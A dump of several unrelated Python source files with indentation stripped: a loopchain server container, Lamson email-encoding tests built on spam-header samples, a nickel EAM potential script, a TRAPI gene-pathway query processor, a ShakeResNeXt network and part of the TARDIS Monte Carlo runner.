class ServerType(Enum):
REST_RS = 1
REST_PEER = 2
GRPC = 3
class Container(CommonProcess):
def __init__(self, port, type=ServerType.GRPC, peer_ip=None):
CommonProcess.__init__(self)
self._port = port
self._type = type
self._peer_ip = peer_ip
def run(self, conn):
logging.debug("Container run...")
if self._type == ServerType.GRPC:
server = grpc.server(futures.ThreadPoolExecutor(max_workers=conf.MAX_WORKERS))
loopchain_pb2_grpc.add_ContainerServicer_to_server(self, server)
server.add_insecure_port('[::]:' + str(self._port))
elif self._type == ServerType.REST_PEER:
server = RestServer(self._port, self._peer_ip)
else:
server = RestServerRS(self._port)
server.start()
command = None
while command != "quit":
try:
command, param = conn.recv() # Queue 에 내용이 들어올 때까지 여기서 대기 된다. 따라서 Sleep 이 필요 없다.
logging.debug("Container got: " + str(param))
except Exception as e:
logging.warning("Container conn.recv() error: " + str(e))
if self._type == ServerType.GRPC:
server.stop(0)
else:
server.stop()
logging.info("Server Container Ended.")
|
py | 7dfa0f6f2b0a3efd37074b95b1df97e91d805174 | from __future__ import with_statement
from nose.tools import *
import re
import os
from lamson import encoding, mail
import mailbox
import email
from email import encoders
from email.utils import parseaddr
from mock import *
import chardet
BAD_HEADERS = [
u'"\u8003\u53d6\u5206\u4eab" <[email protected]>'.encode('utf-8'),
'"=?windows-1251?B?RXhxdWlzaXRlIFJlcGxpY2E=?="\n\t<[email protected]>',
'=?iso-2022-jp?B?Zmlicm91c19mYXZvcmF0ZUB5YWhvby5jby5qcA==?=<[email protected]>',
'=?windows-1252?Q?Global_Leadership_in_HandCare_-_Consumer,\n\t_Professional_and_Industrial_Products_OTC_:_FLKI?=',
'=?windows-1252?q?Global_Leadership_in_Handcare_-_Consumer, _Auto,\n\t_Professional_&_Industrial_Products_-_OTC_:_FLKI?=',
'I am just normal.',
'=?koi8-r?B?WW91ciBtYW6ScyBzdGFtaW5hIHdpbGwgY29tZSBiYWNrIHRvIHlvdSBs?=\n\t=?koi8-r?B?aWtlIGEgYm9vbWVyYW5nLg==?=',
'=?koi8-r?B?WW91IGNhbiBiZSBvbiB0b3AgaW4gYmVkcm9vbSBhZ2FpbiCWIGp1c3Qg?=\n\t=?koi8-r?B?YXNrIHVzIGZvciBhZHZpY2Uu?=',
'"=?koi8-r?B?5MXMz9DSz8na18/E09TXzw==?=" <[email protected]>',
'=?utf-8?b?IumrlOiCsuWckuWNgOermSDihpIg6ZW35bqa6Yar6Zmi56uZIOKGkiDmlofljJbk?=\n =?utf-8?b?uInot6/nq5kiIDx2Z3hkcmp5Y2lAZG5zLmh0Lm5ldC50dz4=?=',
'=?iso-8859-1?B?SOlhdnkgTel05WwgVW7uY/hk?=\n\t=?iso-8859-1?Q?=E9?=',
]
DECODED_HEADERS = encoding.header_from_mime_encoding(BAD_HEADERS)
NORMALIZED_HEADERS = [encoding.header_to_mime_encoding(x) for x in DECODED_HEADERS]
def test_MailBase():
the_subject = u'p\xf6stal'
m = encoding.MailBase()
m['To'] = "testing@localhost"
m['Subject'] = the_subject
assert m['To'] == "testing@localhost"
assert m['TO'] == m['To']
assert m['to'] == m['To']
assert m['Subject'] == the_subject
assert m['subject'] == m['Subject']
assert m['sUbjeCt'] == m['Subject']
msg = encoding.to_message(m)
m2 = encoding.from_message(msg)
assert_equal(len(m), len(m2))
for k in m:
assert m[k] == m2[k], "%s: %r != %r" % (k, m[k], m2[k])
for k in m.keys():
assert k in m
del m[k]
assert not k in m
def test_header_to_mime_encoding():
for i, header in enumerate(DECODED_HEADERS):
assert_equal(NORMALIZED_HEADERS[i], encoding.header_to_mime_encoding(header))
def test_dumb_shit():
# this is a sample of possibly the worst case Mutt can produce
idiot = '=?iso-8859-1?B?SOlhdnkgTel05WwgVW7uY/hk?=\n\t=?iso-8859-1?Q?=E9?='
should_be = u'H\xe9avy M\xe9t\xe5l Un\xeec\xf8d\xe9'
assert_equal(encoding.header_from_mime_encoding(idiot), should_be)
def test_header_from_mime_encoding():
assert not encoding.header_from_mime_encoding(None)
assert_equal(len(BAD_HEADERS), len(encoding.header_from_mime_encoding(BAD_HEADERS)))
for i, header in enumerate(BAD_HEADERS):
assert_equal(DECODED_HEADERS[i], encoding.header_from_mime_encoding(header))
def test_to_message_from_message_with_spam():
mb = mailbox.mbox("tests/spam")
fails = 0
total = 0
for msg in mb:
try:
m = encoding.from_message(msg)
out = encoding.to_message(m)
assert repr(out)
m2 = encoding.from_message(out)
for k in m:
if '@' in m[k]:
assert_equal(parseaddr(m[k]), parseaddr(m2[k]))
else:
assert m[k].strip() == m2[k].strip(), "%s: %r != %r" % (k, m[k], m2[k])
assert not m[k].startswith(u"=?")
assert not m2[k].startswith(u"=?")
assert m.body == m2.body, "Bodies don't match"
assert_equal(len(m.parts), len(m2.parts), "Not the same number of parts.")
for i, part in enumerate(m.parts):
assert part.body == m2.parts[i].body, "Part %d isn't the same: %r \nvs\n. %r" % (i, part.body, m2.parts[i].body)
total += 1
except encoding.EncodingError, exc:
fails += 1
assert fails/total < 0.01, "There were %d failures out of %d total." % (fails, total)
def test_to_file_from_file():
mb = mailbox.mbox("tests/spam")
msg = encoding.from_message(mb[0])
outfile = "run/encoding_test.msg"
with open(outfile, 'w') as outfp:
encoding.to_file(msg, outfp)
with open(outfile) as outfp:
msg2 = encoding.from_file(outfp)
outdata = open(outfile).read()
assert_equal(len(msg), len(msg2))
os.unlink(outfile)
def test_guess_encoding_and_decode():
for header in DECODED_HEADERS:
try:
encoding.guess_encoding_and_decode('ascii', header.encode('utf-8'))
except encoding.EncodingError:
pass
def test_attempt_decoding():
for header in DECODED_HEADERS:
encoding.attempt_decoding('ascii', header.encode('utf-8'))
def test_properly_decode_header():
for i, header in enumerate(BAD_HEADERS):
parsed = encoding.properly_decode_header(header)
assert_equal(DECODED_HEADERS[i], parsed)
def test_headers_round_trip():
# round trip the headers to make sure they convert reliably back and forth
for header in BAD_HEADERS:
original = encoding.header_from_mime_encoding(header)
assert original
assert "=?" not in original and "?=" not in original, "Didn't decode: %r" % (encoding.SCANNER.scan(header),)
encoded = encoding.header_to_mime_encoding(original)
assert encoded
return_original = encoding.header_from_mime_encoding(encoded)
assert_equal(original, return_original)
return_encoded = encoding.header_to_mime_encoding(return_original)
assert_equal(encoded, return_encoded)
def test_MIMEPart():
text1 = encoding.MIMEPart("text/plain")
text1.set_payload("The first payload.")
text2 = encoding.MIMEPart("text/plain")
text2.set_payload("The second payload.")
image_data = open("tests/lamson.png").read()
img1 = encoding.MIMEPart("image/png")
img1.set_payload(image_data)
img1.set_param('attachment','', header='Content-Disposition')
img1.set_param('filename','lamson.png', header='Content-Disposition')
encoders.encode_base64(img1)
multi = encoding.MIMEPart("multipart/mixed")
for x in [text1, text2, img1]:
multi.attach(x)
mail = encoding.from_message(multi)
assert mail.parts[0].body == "The first payload."
assert mail.parts[1].body == "The second payload."
assert mail.parts[2].body == image_data
encoding.to_message(mail)
@patch('chardet.detect', new=Mock())
@raises(encoding.EncodingError)
def test_guess_encoding_fails_completely():
chardet.detect.return_value = {'encoding': None, 'confidence': 0.0}
encoding.guess_encoding_and_decode('ascii', 'some data', errors='strict')
def test_attach_text():
mail = encoding.MailBase()
mail.attach_text("This is some text.", 'text/plain')
msg = encoding.to_message(mail)
assert msg.get_payload(0).get_payload() == "This is some text."
assert encoding.to_string(mail)
mail.attach_text("<html><body><p>Hi there.</p></body></html>", "text/html")
msg = encoding.to_message(mail)
assert len(msg.get_payload()) == 2
assert encoding.to_string(mail)
def test_attach_file():
mail = encoding.MailBase()
png = open("tests/lamson.png").read()
mail.attach_file("lamson.png", png, "image/png", "attachment")
msg = encoding.to_message(mail)
payload = msg.get_payload(0)
assert payload.get_payload(decode=True) == png
assert payload.get_filename() == "lamson.png", payload.get_filename()
def test_content_encoding_headers_are_maintained():
inmail = encoding.from_file(open("tests/signed.msg"))
ctype, ctype_params = inmail.content_encoding['Content-Type']
assert_equal(ctype, 'multipart/signed')
# these have to be maintained
for key in ['protocol', 'micalg']:
assert key in ctype_params
# these get removed
for key in encoding.CONTENT_ENCODING_REMOVED_PARAMS:
assert key not in ctype_params
outmsg = encoding.to_message(inmail)
ctype, ctype_params = encoding.parse_parameter_header(outmsg, 'Content-Type')
for key in ['protocol', 'micalg']:
assert key in ctype_params, key
def test_odd_content_type_with_charset():
mail = encoding.MailBase()
mail.body = u"p\xf6stal".encode('utf-8')
mail.content_encoding['Content-Type'] = ('application/plain', {'charset': 'utf-8'})
msg = encoding.to_string(mail)
assert msg
def test_specially_borked_lua_message():
assert encoding.from_file(open("tests/borked.msg"))
def raises_TypeError(*args):
raise TypeError()
@patch('lamson.encoding.MIMEPart.__init__')
@raises(encoding.EncodingError)
def test_to_message_encoding_error(mp_init):
mp_init.side_effect = raises_TypeError
test = encoding.from_file(open("tests/borked.msg"))
msg = encoding.to_message(test)
def raises_UnicodeError(*args):
raise UnicodeError()
@raises(encoding.EncodingError)
def test_guess_encoding_and_decode_unicode_error():
data = Mock()
data.__str__ = Mock()
data.__str__.return_value = u"\0\0"
data.decode.side_effect = raises_UnicodeError
encoding.guess_encoding_and_decode("ascii", data)
def test_attempt_decoding_with_bad_encoding_name():
assert_equal("test", encoding.attempt_decoding("asdfasdf", "test"))
@raises(encoding.EncodingError)
def test_apply_charset_to_header_with_bad_encoding_char():
encoding.apply_charset_to_header('ascii', 'X', 'bad')
def test_odd_roundtrip_bug():
decoded_addrs=[u'"\u0414\u0435\u043b\u043e\u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u043e" <[email protected]>',
u'"\u8003\u53d6\u5206\u4eab" <[email protected]>',
u'"Exquisite Replica"\n\t<[email protected]>',]
for decoded in decoded_addrs:
encoded = encoding.header_to_mime_encoding(decoded)
assert '<' in encoded and '"' in encoded, "Address wasn't encoded correctly:\n%s" % encoded
|
py | 7dfa109ce8d225afee512d9536199343d4bb9d44 | import pytest
import os
from collections import OrderedDict
# <----- TESTING HARNESS VARIABLES
Ni_eam_potential_definition = OrderedDict()
Ni_eam_potential_definition['potential_type'] = 'eam'
Ni_eam_potential_definition['setfl_filename']=None
Ni_eam_potential_definition['pair_type']='morse'
Ni_eam_potential_definition['density_type']='eam_dens_exp'
Ni_eam_potential_definition['embedding_type']='eam_embed_universal'
Ni_eam_potential_definition['N_r'] = 2000
Ni_eam_potential_definition['r_max'] = 10.0
Ni_eam_potential_definition['r_cut'] = 8.9
Ni_eam_potential_definition['N_rho'] = 2000
Ni_eam_potential_definition['rho_max'] = 10.0
Ni_eam_potential_definition['symbols'] = ['Ni']
Ni_eam_parameters = OrderedDict()
Ni_eam_parameters['p_NiNi_D0'] = 0.001114
Ni_eam_parameters['p_NiNi_a'] = 3.429506
Ni_eam_parameters['p_NiNi_r0'] = 2.6813
Ni_eam_parameters['d_Ni_rho0'] = 10.0
Ni_eam_parameters['d_Ni_beta'] = 5.0
Ni_eam_parameters['d_Ni_r0'] = 2.0
Ni_eam_parameters['e_Ni_F0'] = 4.10341782e-3
Ni_eam_parameters['e_Ni_p'] = 8.96274624
Ni_eam_parameters['e_Ni_q'] = 8.95940869
Ni_eam_parameters['e_Ni_F1'] = -3.09
configuration = OrderedDict()
configuration['potential'] = Ni_eam_potential_definition
configuration['parameters'] = Ni_eam_parameters
#<------------- unpack dictionary
symbols = configuration['potential']['symbols']
func_pair = configuration['potential']['pair_type']
func_density = configuration['potential']['density_type']
func_embedding = configuration['potential']['embedding_type']
parameters = configuration['parameters']
#<------------ setup for testing
from pypospack.potential import EamPotential
eam = EamPotential(
symbols=symbols,
func_pair=func_pair,
func_density=func_density,
func_embedding=func_embedding)
a0 = 3.50803
sites = ['T','O','1NN','2NN','3NN']
N = OrderedDict()
N['T'] = 4
N['O'] = 4
N['1NN'] = 12
N['2NN'] = 6
N['3NN'] = 24
da = OrderedDict()
da['T'] = 0.433
da['O'] = 0.866
da['1NN']= 0.707
da['2NN']= 1.00
da['3NN'] = 1.225
rcut = 0.5 * (da['2NN'] + da['3NN'])
rho = OrderedDict()
for s in sites:
_pair = eam.evaluate_density(
r=a0*da[s],
parameters=parameters)
for p in _pair:
if p not in rho: rho[p] = OrderedDict()
rho[p][s] = _pair[p]
print(rho)
_pair = [p for p in rho]
for p in _pair:
for s in sites:
print("{s:^10}{N_s:^10}{da:^10.4f}{rho:^15.4e}{ttl_rho:^15.4e}".format(
s=s,
N_s=N[s],
da=da[s],
rho=rho[p][s],
ttl_rho=N[s]*rho[p][s]))
sites_lte_1NN = ['1NN']
rho_lte_1NN = 0.
filename = "Ni.eam.alloy"
Nr = configuration['potential']['N_r']
rmax = configuration['potential']['r_max']
rcut = configuration['potential']['r_cut']
Nrho = configuration['potential']['N_rho']
rhomax = configuration['potential']['rho_max']
eam.write_setfl_file(
filename=filename,
symbols=symbols,
Nr=Nr,
rmax=rmax,
rcut=rcut,
Nrho=Nrho,
rhomax=rhomax,
parameters=parameters)
assert os.path.isfile(filename)
|
py | 7dfa1107c8990bf35bd842f176536ebc04668d79 | from sys import path
from django.http import response
from django.http.response import JsonResponse
from trapi_model import knowledge_graph
from trapi_model.query import Query
from trapi_model.biolink.constants import *
from trapi_model.knowledge_graph import KnowledgeGraph, KNode, KEdge
from .models import *
class QueryProcessor:
def __init__(self, query) -> None:
self.query = query
self.response = None
def build_response(self) -> None:
raise NotImplementedError
def get_response(self) -> JsonResponse:
raise NotImplementedError
def extract_primary_key() -> str:
raise NotImplementedError
class PathwayToGeneWildcardQueryProcessor(QueryProcessor):
def __init__(self, query) -> None:
super().__init__(query)
self.pathway_nodes_id = query.message.query_graph.find_nodes(categories=[BIOLINK_PATHWAY_ENTITY])
self.pathway_nodes_id = list(self.pathway_nodes_id)[0]
pathway_node = query.message.query_graph.nodes.get(self.pathway_nodes_id)
self.pathway_curie = (pathway_node.ids[0])
#TODO: implement querying
self.response = 'dd'
def getResponse(self):
return JsonResponse(self.response, safe=False)
class GeneToPathwayWildcardQueryProcessor(QueryProcessor):
def __init__(self, query) -> None:
super().__init__(query)
self.gene_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_GENE_ENTITY])
self.gene_nodes_ids = list(self.gene_nodes_ids)[0]
gene_node = query.message.query_graph.nodes.get(self.gene_nodes_ids)
self.gene_curie = (gene_node.ids[0])
self.pathways = GeneToPathway.objects.get(gene__exact=self.gene_curie).get_result()
print(self.pathways)
self.build_response()
def build_response(self) -> None:
knowledge_graph = KnowledgeGraph()
gene_count = 0
knowledge_graph.add_node(curie=self.gene_curie, categories="biolink:Gene", name=self.gene_curie)
for pathway in self.pathways:
gene_count = gene_count + 1
print(pathway)
knowledge_graph.add_node(curie=pathway, categories="biolink:Pathway", name=pathway)
knowledge_graph.add_edge(k_subject='n0', k_object="n{}".format(gene_count), predicate="biolink:participates_in")
self.response = knowledge_graph.to_dict()
def getResponse(self) -> JsonResponse:
return JsonResponse(self.response, safe=False)
class InvalidQueryProcessor(QueryProcessor):
def __init__(self,query) -> None:
super().__init__(query)
def getResponse(self):
return JsonResponse('invalid query type', safe=False)
class QueryIdentifier:
"""
Identifies the type of query being passed so that the appropriate query processor7 may be applied to the query
:param
"""
@staticmethod
def getQueryProcessor(request) -> QueryProcessor:
def isGeneToPathwayWildcardQuery(query:Query)->bool:
"""
Identifies if a query is a gene to pathway query
"""
#check genes
pathway_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_PATHWAY_ENTITY])
gene_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_GENE_ENTITY])
if pathway_nodes_ids is None:
return False
if gene_nodes_ids is None:
return False
if len(pathway_nodes_ids) != 1:
return False
if len(gene_nodes_ids) != 1:
return False
#check edge
edges = query.message.query_graph.edges
if len(edges) != 1:
return False
id = list(edges.keys())[0]
edge = edges.get(id)
#check predicate
predicates = edge.predicates
if len(predicates) != 1:
return False
predicate = predicates[0]
predicate = predicate.passed_name
if predicate != 'biolink:participates_in':
return False
#return True if all is swell
return True
def isPathwayToGeneWildcardQuery(query:Query)->bool:
"""
Identifies if a query is a pathway to gene query
"""
pathway_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_PATHWAY_ENTITY])
gene_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_GENE_ENTITY])
if pathway_nodes_ids is None:
return False
if gene_nodes_ids is None:
return False
if len(pathway_nodes_ids) != 1:
return False
if len(gene_nodes_ids) != 1:
return False
#check edge
edges = query.message.query_graph.edges
if len(edges) != 1:
return False
id = list(edges.keys())[0]
edge = edges.get(id)
#check predicate
predicates = edge.predicates
if len(predicates) != 1:
return False
predicate = predicates[0]
predicate = predicate.passed_name
if predicate != 'biolink:has_participant':
return False
#return True if all is swell
return True
#Load in query from
query = Query.load('1.1', biolink_version=None, query=request.data, metakgValidation=False, semanticOperations=False)
query_processor = None
if isPathwayToGeneWildcardQuery(query):
query_processor = PathwayToGeneWildcardQueryProcessor(query)
elif isGeneToPathwayWildcardQuery(query):
query_processor = GeneToPathwayWildcardQueryProcessor(query)
else:
query_processor = InvalidQueryProcessor(query)
return query_processor
|
py | 7dfa111e7e834676abfb3857f0c41d718433368f | # -*- coding: utf-8 -*-
import math
import torch.nn as nn
import torch.nn.functional as F
from .shakeshake import ShakeShake
from .shakeshake import Shortcut
class ShakeBottleNeck(nn.Module):
def __init__(self, in_ch, mid_ch, out_ch, cardinary, stride=1):
super(ShakeBottleNeck, self).__init__()
self.equal_io = in_ch == out_ch
self.shortcut = None if self.equal_io else Shortcut(in_ch, out_ch, stride=stride)
self.branch1 = self._make_branch(in_ch, mid_ch, out_ch, cardinary, stride)
self.branch2 = self._make_branch(in_ch, mid_ch, out_ch, cardinary, stride)
def forward(self, x):
h1 = self.branch1(x)
h2 = self.branch2(x)
h = ShakeShake.apply(h1, h2, self.training)
h0 = x if self.equal_io else self.shortcut(x)
return h + h0
def _make_branch(self, in_ch, mid_ch, out_ch, cardinary, stride=1):
return nn.Sequential(
nn.Conv2d(in_ch, mid_ch, 1, padding=0, bias=False),
nn.BatchNorm2d(mid_ch),
nn.ReLU(inplace=False),
nn.Conv2d(mid_ch, mid_ch, 3, padding=1, stride=stride, groups=cardinary, bias=False),
nn.BatchNorm2d(mid_ch),
nn.ReLU(inplace=False),
nn.Conv2d(mid_ch, out_ch, 1, padding=0, bias=False),
nn.BatchNorm2d(out_ch))
class ShakeResNeXt(nn.Module):
def __init__(self, depth, w_base, cardinary, label):
super(ShakeResNeXt, self).__init__()
n_units = (depth - 2) // 9
n_chs = [64, 128, 256, 1024]
self.n_chs = n_chs
self.in_ch = n_chs[0]
self.c_in = nn.Conv2d(3, n_chs[0], 3, padding=1)
self.layer1 = self._make_layer(n_units, n_chs[0], w_base, cardinary)
self.layer2 = self._make_layer(n_units, n_chs[1], w_base, cardinary, 2)
self.layer3 = self._make_layer(n_units, n_chs[2], w_base, cardinary, 2)
self.fc_out = nn.Linear(n_chs[3], label)
# Initialize paramters
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.bias.data.zero_()
def forward(self, x):
h = self.c_in(x)
h = self.layer1(h)
h = self.layer2(h)
h = self.layer3(h)
h = F.relu(h)
h = F.avg_pool2d(h, 8)
h = h.view(-1, self.n_chs[3])
h = self.fc_out(h)
return h
def _make_layer(self, n_units, n_ch, w_base, cardinary, stride=1):
layers = []
mid_ch, out_ch = n_ch * (w_base // 64) * cardinary, n_ch * 4
for i in range(n_units):
layers.append(ShakeBottleNeck(self.in_ch, mid_ch, out_ch, cardinary, stride=stride))
self.in_ch, stride = out_ch, 1
return nn.Sequential(*layers)
|
py | 7dfa116ca8f1645119be49297fe077082b8c3db7 | import os
import logging
import warnings
from astropy import units as u
from tardis import constants as const
from numba import set_num_threads
from scipy.special import zeta
from tardis.montecarlo.spectrum import TARDISSpectrum
from tardis.util.base import quantity_linspace
from tardis.io.util import HDFWriterMixin
from tardis.montecarlo import packet_source as source
from tardis.montecarlo.montecarlo_numba.formal_integral import FormalIntegrator
from tardis.montecarlo import montecarlo_configuration as mc_config_module
from tardis.montecarlo.montecarlo_numba import montecarlo_radial1d
from tardis.montecarlo.montecarlo_numba.numba_interface import (
configuration_initialize,
)
from tardis.montecarlo.montecarlo_numba import numba_config
from tardis.io.logger import montecarlo_tracking as mc_tracker
import numpy as np
logger = logging.getLogger(__name__)
MAX_SEED_VAL = 2 ** 32 - 1
# MAX_SEED_VAL must be multiple orders of magnitude larger than no_of_packets;
# otherwise, each packet would not have its own seed. Here, we set the max
# seed val to the maximum allowed by numpy.
# TODO: refactor this into more parts
class MontecarloRunner(HDFWriterMixin):
"""
This class is designed as an interface between the Python part and the
montecarlo C-part
"""
hdf_properties = [
"output_nu",
"output_energy",
"nu_bar_estimator",
"j_estimator",
"montecarlo_virtual_luminosity",
"last_interaction_in_nu",
"last_interaction_type",
"last_line_interaction_in_id",
"last_line_interaction_out_id",
"last_line_interaction_shell_id",
"packet_luminosity",
"spectrum",
"spectrum_virtual",
"spectrum_reabsorbed",
"time_of_simulation",
"emitted_packet_mask",
]
vpacket_hdf_properties = [
"virt_packet_nus",
"virt_packet_energies",
"virt_packet_initial_rs",
"virt_packet_initial_mus",
"virt_packet_last_interaction_in_nu",
"virt_packet_last_interaction_type",
"virt_packet_last_line_interaction_in_id",
"virt_packet_last_line_interaction_out_id",
]
hdf_name = "runner"
w_estimator_constant = (
(const.c ** 2 / (2 * const.h))
* (15 / np.pi ** 4)
* (const.h / const.k_B) ** 4
/ (4 * np.pi)
).cgs.value
t_rad_estimator_constant = (
(np.pi ** 4 / (15 * 24 * zeta(5, 1))) * (const.h / const.k_B)
).cgs.value
def __init__(
self,
seed,
spectrum_frequency,
virtual_spectrum_spawn_range,
disable_electron_scattering,
enable_reflective_inner_boundary,
enable_full_relativity,
inner_boundary_albedo,
line_interaction_type,
integrator_settings,
v_packet_settings,
spectrum_method,
virtual_packet_logging,
packet_source=None,
debug_packets=False,
logger_buffer=1,
single_packet_seed=None,
):
self.seed = seed
if packet_source is None:
self.packet_source = source.BlackBodySimpleSource(seed)
else:
self.packet_source = packet_source
# inject different packets
self.disable_electron_scattering = disable_electron_scattering
self.spectrum_frequency = spectrum_frequency
self.virtual_spectrum_spawn_range = virtual_spectrum_spawn_range
self.enable_reflective_inner_boundary = enable_reflective_inner_boundary
self.inner_boundary_albedo = inner_boundary_albedo
self.enable_full_relativity = enable_full_relativity
numba_config.ENABLE_FULL_RELATIVITY = enable_full_relativity
self.line_interaction_type = line_interaction_type
self.single_packet_seed = single_packet_seed
self.integrator_settings = integrator_settings
self.v_packet_settings = v_packet_settings
self.spectrum_method = spectrum_method
self.seed = seed
self._integrator = None
self._spectrum_integrated = None
self.virt_logging = virtual_packet_logging
self.virt_packet_last_interaction_type = np.ones(2) * -1
self.virt_packet_last_interaction_in_nu = np.ones(2) * -1.0
self.virt_packet_last_line_interaction_in_id = np.ones(2) * -1
self.virt_packet_last_line_interaction_out_id = np.ones(2) * -1
self.virt_packet_nus = np.ones(2) * -1.0
self.virt_packet_energies = np.ones(2) * -1.0
self.virt_packet_initial_rs = np.ones(2) * -1.0
self.virt_packet_initial_mus = np.ones(2) * -1.0
# set up logger based on config
mc_tracker.DEBUG_MODE = debug_packets
mc_tracker.BUFFER = logger_buffer
if self.spectrum_method == "integrated":
self.optional_hdf_properties.append("spectrum_integrated")
def _initialize_estimator_arrays(self, tau_sobolev_shape):
"""
Initialize the output arrays of the montecarlo simulation.
Parameters
----------
tau_sobolev_shape : tuple
tuple for the tau_sobolev_shape
"""
# Estimators
self.j_estimator = np.zeros(tau_sobolev_shape[1], dtype=np.float64)
self.nu_bar_estimator = np.zeros(tau_sobolev_shape[1], dtype=np.float64)
self.j_blue_estimator = np.zeros(tau_sobolev_shape)
self.Edotlu_estimator = np.zeros(tau_sobolev_shape)
# TODO: this is the wrong attribute naming style.
def _initialize_geometry_arrays(self, model):
"""
Generate the cgs like geometry arrays for the montecarlo part
Parameters
----------
model : model.Radial1DModel
"""
self.r_inner_cgs = model.r_inner.to("cm").value
self.r_outer_cgs = model.r_outer.to("cm").value
self.v_inner_cgs = model.v_inner.to("cm/s").value
def _initialize_packets(self, T, no_of_packets, iteration, radius):
# the iteration is added each time to preserve randomness
# across different simulations with the same temperature,
# for example. We seed the random module instead of the numpy module
# because we call random.sample, which references a different internal
# state than in the numpy.random module.
seed = self.seed + iteration
rng = np.random.default_rng(seed=seed)
seeds = rng.choice(MAX_SEED_VAL, no_of_packets, replace=True)
radii, nus, mus, energies = self.packet_source.create_packets(
T, no_of_packets, rng, radius
)
mc_config_module.packet_seeds = seeds
self.input_r = radii
self.input_nu = nus
self.input_mu = mus
self.input_energy = energies
self._output_nu = np.ones(no_of_packets, dtype=np.float64) * -99.0
self._output_energy = np.ones(no_of_packets, dtype=np.float64) * -99.0
self.last_line_interaction_in_id = -1 * np.ones(
no_of_packets, dtype=np.int64
)
self.last_line_interaction_out_id = -1 * np.ones(
no_of_packets, dtype=np.int64
)
self.last_line_interaction_shell_id = -1 * np.ones(
no_of_packets, dtype=np.int64
)
self.last_interaction_type = -1 * np.ones(no_of_packets, dtype=np.int64)
self.last_interaction_in_nu = np.zeros(no_of_packets, dtype=np.float64)
self._montecarlo_virtual_luminosity = u.Quantity(
np.zeros_like(self.spectrum_frequency.value), "erg / s"
)
@property
def spectrum(self):
return TARDISSpectrum(
self.spectrum_frequency, self.montecarlo_emitted_luminosity
)
@property
def spectrum_reabsorbed(self):
return TARDISSpectrum(
self.spectrum_frequency, self.montecarlo_reabsorbed_luminosity
)
@property
def spectrum_virtual(self):
if np.all(self.montecarlo_virtual_luminosity == 0):
warnings.warn(
"MontecarloRunner.spectrum_virtual"
"is zero. Please run the montecarlo simulation with"
"no_of_virtual_packets > 0",
UserWarning,
)
return TARDISSpectrum(
self.spectrum_frequency, self.montecarlo_virtual_luminosity
)
@property
def spectrum_integrated(self):
if self._spectrum_integrated is None:
self._spectrum_integrated = self.integrator.calculate_spectrum(
self.spectrum_frequency[:-1], **self.integrator_settings
)
return self._spectrum_integrated
@property
def integrator(self):
if self._integrator is None:
warnings.warn(
"MontecarloRunner.integrator: "
"The FormalIntegrator is not yet available."
"Please run the montecarlo simulation at least once.",
UserWarning,
)
if self.enable_full_relativity:
raise NotImplementedError(
"The FormalIntegrator is not yet implemented for the full "
"relativity mode. "
"Please run with config option enable_full_relativity: "
"False."
)
return self._integrator
def run(
self,
model,
plasma,
no_of_packets,
no_of_virtual_packets=0,
nthreads=1,
last_run=False,
iteration=0,
total_iterations=0,
show_progress_bars=True,
):
"""
Run the montecarlo calculation
Parameters
----------
model : tardis.model.Radial1DModel
plasma : tardis.plasma.BasePlasma
no_of_packets : int
no_of_virtual_packets : int
nthreads : int
last_run : bool
total_iterations : int
The total number of iterations in the simulation.
Returns
-------
None
"""
set_num_threads(nthreads)
self.time_of_simulation = self.calculate_time_of_simulation(model)
self.volume = model.volume
# Initializing estimator array
self._initialize_estimator_arrays(plasma.tau_sobolevs.shape)
self._initialize_geometry_arrays(model)
self._initialize_packets(
model.t_inner.value, no_of_packets, iteration, model.r_inner[0]
)
configuration_initialize(self, no_of_virtual_packets)
montecarlo_radial1d(
model,
plasma,
iteration,
no_of_packets,
total_iterations,
show_progress_bars,
self,
)
self._integrator = FormalIntegrator(model, plasma, self)
# montecarlo.montecarlo_radial1d(
# model, plasma, self,
# virtual_packet_flag=no_of_virtual_packets,
# nthreads=nthreads,
# last_run=last_run)
def legacy_return(self):
return (
self.output_nu,
self.output_energy,
self.j_estimator,
self.nu_bar_estimator,
self.last_line_interaction_in_id,
self.last_line_interaction_out_id,
self.last_interaction_type,
self.last_line_interaction_shell_id,
)
def get_line_interaction_id(self, line_interaction_type):
return ["scatter", "downbranch", "macroatom"].index(
line_interaction_type
)
@property
def output_nu(self):
return u.Quantity(self._output_nu, u.Hz)
@property
def output_energy(self):
return u.Quantity(self._output_energy, u.erg)
@property
def virtual_packet_nu(self):
try:
return u.Quantity(self.virt_packet_nus, u.Hz)
except AttributeError:
warnings.warn(
"MontecarloRunner.virtual_packet_nu:"
"Set 'virtual_packet_logging: True' in the configuration file"
"to access this property"
"It should be added under 'virtual' property of 'spectrum' property",
UserWarning,
)
return None
@property
def virtual_packet_energy(self):
try:
return u.Quantity(self.virt_packet_energies, u.erg)
except AttributeError:
warnings.warn(
"MontecarloRunner.virtual_packet_energy:"
"Set 'virtual_packet_logging: True' in the configuration file"
"to access this property"
"It should be added under 'virtual' property of 'spectrum' property",
UserWarning,
)
return None
@property
def virtual_packet_luminosity(self):
try:
return self.virtual_packet_energy / self.time_of_simulation
except TypeError:
warnings.warn(
"MontecarloRunner.virtual_packet_luminosity:"
"Set 'virtual_packet_logging: True' in the configuration file"
"to access this property"
"It should be added under 'virtual' property of 'spectrum' property",
UserWarning,
)
return None
@property
def packet_luminosity(self):
return self.output_energy / self.time_of_simulation
@property
def emitted_packet_mask(self):
return self.output_energy >= 0
@property
def emitted_packet_nu(self):
return self.output_nu[self.emitted_packet_mask]
@property
def reabsorbed_packet_nu(self):
return self.output_nu[~self.emitted_packet_mask]
@property
def emitted_packet_luminosity(self):
return self.packet_luminosity[self.emitted_packet_mask]
@property
def reabsorbed_packet_luminosity(self):
return -self.packet_luminosity[~self.emitted_packet_mask]
@property
def montecarlo_reabsorbed_luminosity(self):
return u.Quantity(
np.histogram(
self.reabsorbed_packet_nu,
weights=self.reabsorbed_packet_luminosity,
bins=self.spectrum_frequency.value,
)[0],
"erg / s",
)
@property
def montecarlo_emitted_luminosity(self):
